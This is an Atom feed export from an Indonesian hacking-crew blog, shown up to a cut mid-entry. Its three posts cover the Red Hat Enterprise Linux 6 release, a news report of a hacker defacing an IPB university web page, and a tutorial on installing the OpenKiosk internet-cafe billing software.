<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;DUIEQXg8eCp7ImA9WhRRFE4.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712</id><updated>2011-11-28T06:45:00.670+07:00</updated><category term="Hacking Tools" /><category term="SQLi" /><category term="Dork RFI" /><category term="Kill-9 News" /><category term="Lfi Dork" /><category term="Exploit" /><category term="Linux-Kernel" /><category term="Rfi Scanner" /><category term="LFI Scanner" /><category term="Article" /><category term="tutorial" /><title>KiLL-9 CrEW</title><subtitle type="html">www.kill-9.tk - www.kill-nine.co.nr</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://kill-nines.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://kill-nines.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>146</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/Kill-9Crew" /><feedburner:info uri="kill-9crew" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;AkYERnw9fCp7ImA9Wx9VEks.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-1137963347011812321</id><published>2011-01-29T09:20:00.000+07:00</published><updated>2011-01-29T09:28:27.264+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-29T09:28:27.264+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Article" /><title>Rilis Final Red Hat Enterprise Linux 6 - RHEL 6</title><content type="html">&lt;p style="text-align: center;"&gt;  &lt;img alt="http://bojalinuxer.blogspot.com" class="expando" id="BLOGGER_PHOTO_ID_5538279228833995394" src="http://2.bp.blogspot.com/_2ArRz4Y2WvY/TNvrnZWTGoI/AAAAAAAACds/ZzefwCrJXJk/s400/rhel6.png" border="0" /&gt;&lt;/p&gt; &lt;p&gt; RHEL6 - Red Hat.Inc, penyedia solusi open source terkemuka didunia,  dengan bangga mengumumkan ketersediaan rilis final Red Hat Enterprise  Linux 6. Rilis ini adalah rilis yang dinanti-nantikan dari RHEL 6 yang memuat  perbaikan-perbaikan dan itu tersedia untuk arsitektur i386,  AMD64/Intel64, System z, dan IBM Power (64-bit).&lt;/p&gt; &lt;p&gt; Namun, Red Hat mengumumkan bahwa rilis ini tidak akan memberikan  dukungan bagi arsitektur Intel Itanium. Selain itu, prosesor POWER5  tidak lagi didukung, hanya CPU POWER6 atau yang lebih tinggi yang akan  mendapat dukungan.&lt;/p&gt; &lt;p&gt; "Red Hat Enterprise Linux selama bertahun-tahun menjadi platform  mission-critical pilihan bagi banyak perusahaan. Pelanggan seperti  British Airways, Citi dan NTT Communications telah menjadi mitra  terpercaya dalam pengembangan platform Red Hat Enterprise Linux."&lt;/p&gt; &lt;p&gt; "Kami sekarang memasuki era enterprise computing di mana  fleksibilitas, portabilitas dan interoperabilitas yang lebih penting  daripada sebelumnya. Dan hari ini, kami memberikan platform yang  dibutuhkan konsumen. Ini selalu menjadi fokus kami".&lt;/p&gt; &lt;p&gt; "Apa yang kami berikan lebih terbuka, lebih dapat diandalkan dan  lebih komprehensif daripada produk lain di pasaran. Dimasa mendatang,ini  adalah platform yang dirancang untuk menghantar pelanggan ke generasi  berikutnya dengan virtualisasi dan cloud". - Kata Paul Cormier,  executive vice president and president, Products and Technologies di Red  Hat, pada &lt;a href="http://www.redhat.com/about/news/prarchive/2010/new-standard.html" target="new"&gt;press release&lt;/a&gt;.&lt;/p&gt; &lt;div style="text-align: center;"&gt; &lt;img alt="http://bojalinuxer.blogspot.com" class="expando" id="BLOGGER_PHOTO_ID_5538279223747647890" src="http://1.bp.blogspot.com/_2ArRz4Y2WvY/TNvrnGZnmZI/AAAAAAAACdk/cPDFVgLsTsY/s400/gdm-rhel6.png" border="0" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;  Yang baru dengan Red Hat Enterprise Linux 6:&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;   Peningkatan grafis installer;&lt;/li&gt;&lt;li&gt;   Dukungan untuk file sistem baru (EXT4, XFS, NFS, block discard);&lt;/li&gt;&lt;li&gt;   LVM enhancements;&lt;/li&gt;&lt;li&gt;   Power management yang lebih baik dengan powertop dan tuned;&lt;/li&gt;&lt;li&gt;   Peningkatan PackageKit dan Yum package managers;&lt;/li&gt;&lt;li&gt;   Dukungan yang lebih baik untuk clustering, dengan Corosync Cluster Engine;&lt;/li&gt;&lt;li&gt;   Peningkatan keamanan;&lt;/li&gt;&lt;li&gt;   Pelabelan Network packet dan dukungan untuk IPv6;&lt;/li&gt;&lt;li&gt;   Fungsionalitas Suspend dan resume;&lt;/li&gt;&lt;li&gt;   Dukungan untuk multiple display;&lt;/li&gt;&lt;li&gt;   Driver video Nouveau untuk kartu grafis Nvidia;&lt;/li&gt;&lt;li&gt;   Dukunga Internasionalisasi;&lt;/li&gt;&lt;li&gt;   KDE SC 4.3;&lt;/li&gt;&lt;li&gt;   OpenOffice.org Office Suite 3.1;&lt;/li&gt;&lt;li&gt;   Mozilla Thunderbird 3;&lt;/li&gt;&lt;li&gt;   Mozilla Firefox 3.5;&lt;/li&gt;&lt;li&gt;   Apache 2.2.15;&lt;/li&gt;&lt;li&gt;   MySQL 5.1;&lt;/li&gt;&lt;li&gt;   PostgreSQL 8.4;&lt;/li&gt;&lt;li&gt;   Dokumentasi yang lebih baik;&lt;/li&gt;&lt;li&gt;   Peningkatan dukungan C++;&lt;/li&gt;&lt;li&gt;   Peningkatan Samba;&lt;/li&gt;&lt;li&gt;   Dukungan penuh untuk KVM (Kernel-based Virtual Machine);&lt;/li&gt;&lt;li&gt;   Dukungan Alternative PHP Cache (APC) untuk PHP;&lt;/li&gt;&lt;li&gt;   Penambahan memcached.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;  Bagai manapun distribusi Red Hat Enterprise Linux (RHEL) lebih  ditargetkan ke pasar komersial, termasuk mainframe, yang menikmati  dukungan teknis selama 7 tahun atas Red Hat setelah perilisan. Versi  baru RHEL dilepaskan cukup cepat dan dengan demikian, pengguna dapat  meng-upgrade versi yang sedang digunakan ke rilis terbaru secara gratis.  Red Hat didistribusikan menjadi empat versi RHEL: RHEL AS (Advanced  Server), RHEL ES (edge, ekonomi atau server entry-level), RHEL WS  (workstation) dan Red Hat Desktop.&lt;/p&gt; &lt;p&gt; Bagi Anda yang berminat mencoba, dapat men-download RHEL 6 beta 2 di sini.&lt;/p&gt;    &lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;&lt;tbody&gt;&lt;tr&gt; &lt;td class="padding_topbottom5px" width="35"&gt;      &lt;/td&gt; &lt;td&gt; &lt;p class="fontsize14"&gt;      &lt;b&gt;&lt;a href="https://rhn.redhat.com/network/software/download_isos_full.pxt" target="_blank" title="Download Red Hat Enterprise Linux"&gt;Red Hat Enterprise Linux 5.5 (Registration Required)&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;     &lt;span class="download_smalltext"&gt;[iso] [0 KB]&lt;/span&gt;&lt;/p&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td class="padding_topbottom5px" width="35"&gt;      &lt;/td&gt; &lt;td&gt; &lt;p class="fontsize14"&gt;      &lt;b&gt;&lt;a href="ftp://ftp.redhat.com/pub/redhat/rhel/beta/6Server-beta2/i386/iso/RHEL6.0-20100622.1-Server-i386-DVD1.iso" target="_blank" title="Download Red Hat Enterprise Linux"&gt;Red Hat Enterprise Linux 6 Beta 2 (ISO) i386&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;     &lt;span class="download_smalltext"&gt;[iso] [3.40 GB]&lt;/span&gt;&lt;/p&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td class="padding_topbottom5px" width="35"&gt;      &lt;/td&gt; &lt;td&gt; &lt;p class="fontsize14"&gt;      &lt;b&gt;&lt;a href="ftp://ftp.redhat.com/pub/redhat/rhel/beta/6Server-beta2/x86_64/iso/RHEL6.0-20100622.1-Server-x86_64-DVD1.iso" target="_blank" title="Download Red Hat Enterprise Linux"&gt;Red Hat Enterprise Linux 6 Beta 2 (ISO) x86_64&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;     &lt;span class="download_smalltext"&gt;[iso] [3.90 GB]&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1137963347011812321?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/WNLkU3NGRLS88rjN-w5M2tH8uSE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/WNLkU3NGRLS88rjN-w5M2tH8uSE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/WNLkU3NGRLS88rjN-w5M2tH8uSE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/WNLkU3NGRLS88rjN-w5M2tH8uSE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/M_IE-1K1N4E" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1137963347011812321?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1137963347011812321?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/M_IE-1K1N4E/rilis-final-red-hat-enterprise-linux-6.html" title="Rilis Final Red Hat Enterprise Linux 6 - RHEL 6" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_2ArRz4Y2WvY/TNvrnZWTGoI/AAAAAAAACds/ZzefwCrJXJk/s72-c/rhel6.png" height="72" width="72" /><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/rilis-final-red-hat-enterprise-linux-6.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkMGQns9fCp7ImA9Wx9VEkQ.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-6906220117317298221</id><published>2011-01-28T17:48:00.001+07:00</published><updated>2011-01-29T17:53:43.564+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-29T17:53:43.564+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Kill-9 News" /><title>Situs IPB Mudah Dijebol Hacker</title><content type="html">&lt;div class="pc"&gt;&lt;div style="text-align: center;"&gt;                                         &lt;a href="http://webometrics.ipb.ac.id/cms/"&gt;&lt;img src="http://i.okezone.com/content/2010/12/31/55/409103/1HJLSVxvyc.jpg" border="1" width="250" /&gt;&lt;/a&gt;                                         &lt;/div&gt;&lt;h5 style="text-align: center;"&gt;Screenshot web page situs IPB yang di-hack&lt;/h5&gt;&lt;/div&gt;&lt;h5 style="font-weight: normal; font-family: arial;"&gt;&lt;strong&gt;JAKARTA&lt;/strong&gt; - Seorang hacker mengaku bisa menjebol pertahanan di situs resmi &lt;a href="http://webometrics.ipb.ac.id/cms/"&gt;Institut Pertanian Bogor (IPB)&lt;/a&gt;.&lt;br /&gt;Dalam aksinya, sang &lt;em&gt;hacker&lt;/em&gt;  mengaku tidak berniat untuk mengacak-acak situs tersebut. Hanya saja  mereka ingin mengungkapkan jika keamanan jaringan sebuah situs sangatlah  penting. Apalagi saat ini diduga telah terjadi perang &lt;em&gt;cyber&lt;/em&gt; antara &lt;em&gt;hacker&lt;/em&gt; Indonesia dengan Malaysia.&lt;br /&gt;&lt;br /&gt;"Ada beberapa &lt;em&gt;backdoor&lt;/em&gt; yang tertanam di situs &lt;a href="http://webometrics.ipb.ac.id/cms/"&gt;ipb.ac.id&lt;/a&gt;. Itu tugas admin untuk membersihkan dan mem-&lt;em&gt;patch&lt;/em&gt; celah yang berpotensi disusupi &lt;em&gt;hacker&lt;/em&gt;," tulis sang hacker dalam pesannya, Jumat (31/12/2010).&lt;br /&gt;&lt;br /&gt;Memang sang &lt;em&gt;hacker&lt;/em&gt; tidak mengacak-acak situs secara keseluruhan. Buktinya konten-konten dalam situs IPB masih bisa diakses. Hanya saja sang &lt;em&gt;hacker&lt;/em&gt; bisa menerobos keamanan situs dan menambahkan konten baru ke dalam situs tersebut.&lt;br /&gt;&lt;br /&gt;Bahkan dalam satu halaman yang dibuat &lt;em&gt;hacker&lt;/em&gt;  sebagai bukti kemampuannya, yaitu dalam halaman &lt;a href="http://webometrics.ipb.ac.id/cms/"&gt;webometrics.ipb.ac.id&lt;/a&gt;,  dirinya menyematkan sebuah foto yang menggambarkan nasionalisme anak  Indonesia.&lt;/h5&gt;Note: sampai saat ini defacing page masih ada, silahkan di cek di&lt;br /&gt;&lt;a href="http://webometrics.ipb.ac.id/cms/"&gt;&lt;span style="font-weight: bold;"&gt;http://webometrics.ipb.ac.id/cms/&lt;/span&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-6906220117317298221?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/_3Uby4rrkR6x1eYqLCp1Cj9YkKw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_3Uby4rrkR6x1eYqLCp1Cj9YkKw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/_3Uby4rrkR6x1eYqLCp1Cj9YkKw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_3Uby4rrkR6x1eYqLCp1Cj9YkKw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/uCxhl8_2N6o" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6906220117317298221?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/6906220117317298221?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/uCxhl8_2N6o/situs-ipb-mudah-dijebol-hacker.html" title="Situs IPB Mudah Dijebol Hacker" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://3.bp.blogspot.com/_t3RQMzRGaJs/TKHjkJdX9PI/AAAAAAAAADM/YdeC9Rh7QjM/S220/k.jpg" /></author><feedburner:origLink>http://kill-nines.blogspot.com/2011/01/situs-ipb-mudah-dijebol-hacker.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0MHSHsyeCp7ImA9Wx9WFEg.&quot;"><id>tag:blogger.com,1999:blog-5679666230684006712.post-1871278728467151192</id><published>2011-01-19T22:25:00.004+07:00</published><updated>2011-01-19T22:37:19.590+07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-01-19T22:37:19.590+07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Article" /><category scheme="http://www.blogger.com/atom/ns#" term="tutorial" /><title>Installing Linux Billing</title><content type="html">&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable  {mso-style-name:"Table Normal";  mso-tstyle-rowband-size:0;  mso-tstyle-colband-size:0;  mso-style-noshow:yes;  mso-style-parent:"";  mso-padding-alt:0cm 5.4pt 0cm 5.4pt;  mso-para-margin:0cm;  mso-para-margin-bottom:.0001pt;  mso-pagination:widow-orphan;  font-size:10.0pt;  font-family:"Times New Roman";  mso-ansi-language:#0400;  mso-fareast-language:#0400;  mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;div style="text-align: center;"&gt;&lt;img style="cursor: -moz-zoom-in; width: 286px; height: 175px;" alt="http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png" src="http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png" /&gt;&lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span&gt;Here is information on how to install one of the billing program in Linux, namely OpenKiosk: &lt;a href="http://openkiosk.sourceforge.net/"&gt;http://openkiosk.sourceforge.net&lt;/a&gt;. This program can NOT be used in LTSP.&lt;/span&gt; One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free. &lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b style=""&gt;Terms:&lt;/b&gt;&lt;br /&gt;&lt;span&gt;Client (which Linux) to use KDE (not Gnome)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;&lt;span&gt;How To Install&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="google-src-text"&gt;&lt;b style=""&gt;&lt;span&gt;1.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b style=""&gt; Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:&lt;/b&gt;&lt;span style="color:navy;"&gt; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;mkdir / downloads&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;cd / downloads&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="google-src-text"&gt;&lt;b style=""&gt;&lt;span&gt;2.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;b style=""&gt; Download the following programs into / downloads&lt;span style="color:navy;"&gt;&lt;/span&gt; &lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;a. &lt;a href="http://prdownloads.sourceforge.net/openkiosk/nodeview-0.8.3.tar.gz?download"&gt;Nodeview : for Server&lt;/a&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;/span&gt;b.&lt;a href="http://prdownloads.sourceforge.net/openkiosk/kdex11client-0.3.1b.tar.gz?download"&gt; kdex11client&lt;/a&gt; :&lt;/p&gt;&lt;p class="MsoNormal"&gt;c. &lt;a href="http://prdownloads.sourceforge.net/openkiosk/win32lock-0.8.exe?download"&gt;Client for Windows :&lt;/a&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;span style="text-decoration: underline;"&gt;&lt;/span&gt;&lt;span style=""&gt;&lt;/span&gt;d.&lt;a href="http://sunsite.rediris.es/mirror/Qt/source/qt-x11-free-3.3.4.tar.bz2"&gt;Qt:  &lt;/a&gt;(for Server &amp;amp; Client)&lt;/p&gt;&lt;p class="MsoNormal"&gt;e. &lt;a href="http://downloads.sleepycat.com/db-4.3.28.NC.tar.gz"&gt;BerkeleyDB &lt;/a&gt;(for Server &amp;amp; Client)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt; &lt;/span&gt;&lt;br /&gt;&lt;b style=""&gt;3. Install BerkeleyDB : (di SERVER &amp;amp; CLIENT)&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;cd /downloads&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; tar xzvf db-4.3.28.NC.tar.gz&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; cd db-4.3.28.NC&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; cd build_unix&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; ../dist/configure&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; make&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; make install&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; cd ..&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; cd ..&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;b style=""&gt;4. Install Qt : (SERVER &amp;amp; CLIENT)&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;cd /downloads&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; bzip2 -d qt-x11-free-3.3.4.tar.bz2&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; tar xvf qt-x11-free-3.3.4.tar&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; cd qt-x11-free-3.3.4&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; ./configure &lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Qt will ask whether you agree with the contents of his license, &lt;span class="google-src-text"&gt;Enter&lt;/span&gt; type "yes" and press Enter&lt;br /&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;make&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; make install&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; cd .. &lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;b style=""&gt;5. Install Nodeview (controller) (the SERVER)&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;cd /downloads&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; tar xzvf nodeview-0.8.3.tar.gz&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; cd nodeview-0.8.3&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; ./configure&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; make&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; make install&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Nodeview then be run by typing / usr / local / bin / nodeview&lt;/p&gt;    &lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;b style=""&gt;6. Install kdex11client (the CLIENT)&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;cd /downloads&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; tar xzvf kdex11client-0.3.1b.tar.gz&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; cd kdex11client-0.3.1b&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; ./configure&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; make&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 0);"&gt; make install&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;b style=""&gt;7. Run Nodeview&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;span style="color:red;"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;/usr/local/bin/nodeview&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Nodeview will ask for login to the Administrator. &lt;span&gt;Because we run it the first time,&lt;/span&gt; then we can type anything as the password.&lt;br /&gt;&lt;br /&gt;&lt;b style=""&gt;8. Setup Nodeview&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Select the Settings menu - Configuration.&lt;br /&gt;&lt;span&gt;Click the tab Workstation,&lt;/span&gt;&lt;br /&gt;&lt;span&gt;Click on SETUP,&lt;/span&gt;&lt;br /&gt;&lt;span&gt;Enter a workgroup name (free of course, eg cafe)&lt;/span&gt;&lt;br /&gt;&lt;span&gt;Click the ADD,&lt;/span&gt;&lt;br /&gt;&lt;span&gt;Click CLOSE,&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span&gt;Put the computers in your cafe:&lt;/span&gt;&lt;br /&gt;&lt;span&gt;In the "station name", enter the computer name (example: klien1, klien2, etc.)&lt;/span&gt;&lt;br /&gt;&lt;span&gt;In the "IP address", enter the IP address of &lt;span style=""&gt; &lt;/span&gt;this computers.&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Then click on "ADD / EDIT" to add&lt;br /&gt;&lt;br /&gt;&lt;span&gt;Close everything, Nodeview will ask for the password for the Administrator, enter up to you.&lt;/span&gt; Then run it again Nodeview. Now OpenKiosk program is ready for your use.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Hopefully useful..&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5679666230684006712-1871278728467151192?l=kill-nines.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/jPgwxQgHu0LQ22wK6QlfXA3fnqU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jPgwxQgHu0LQ22wK6QlfXA3fnqU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/jPgwxQgHu0LQ22wK6QlfXA3fnqU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/jPgwxQgHu0LQ22wK6QlfXA3fnqU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Kill-9Crew/~4/B9hdaggp98Y" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1871278728467151192?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5679666230684006712/posts/default/1871278728467151192?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Kill-9Crew/~3/B9hdaggp98Y/installing-linux-billing.html" title="Installing Linux Billing" /><author><name>arianom</name><uri>http://www.blogger.com/profile/00390503237917172808</uri><email>noreply@blogger.com</email><gd:image 